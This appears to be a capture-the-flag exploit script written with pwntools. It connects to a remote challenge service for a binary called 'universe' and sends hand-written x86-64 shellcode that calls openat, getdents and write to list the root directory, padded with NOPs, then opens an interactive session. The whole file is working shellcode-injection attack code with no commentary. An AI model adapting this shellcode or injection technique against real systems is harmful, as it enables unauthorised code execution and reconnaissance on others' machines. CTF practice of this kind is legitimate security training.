35 lines
518 B
Python
35 lines
518 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./universe", checksec=False)
|
|
# r = process()
|
|
r = remote("challenge.bugpwn.com", 1004)
|
|
|
|
# openat + getdents + write
|
|
shellcode="""
|
|
mov r9, [rsp]
|
|
sub r9, 0x1370
|
|
add r9, 0x4500
|
|
mov r15, 0x2f
|
|
push r15
|
|
lea rsi, [rsp]
|
|
cqo
|
|
xor r10, r10
|
|
add ax, 257
|
|
syscall
|
|
mov edi, eax
|
|
mov al, 78
|
|
mov rsi, r9
|
|
mov dx, 1000
|
|
syscall
|
|
mov edi, 1
|
|
mov eax, 1
|
|
syscall
|
|
"""
|
|
shellcode = asm(shellcode)
|
|
shellcode += b"\x90"*(4096-len(shellcode))
|
|
r.sendline(shellcode)
|
|
|
|
r.interactive()
|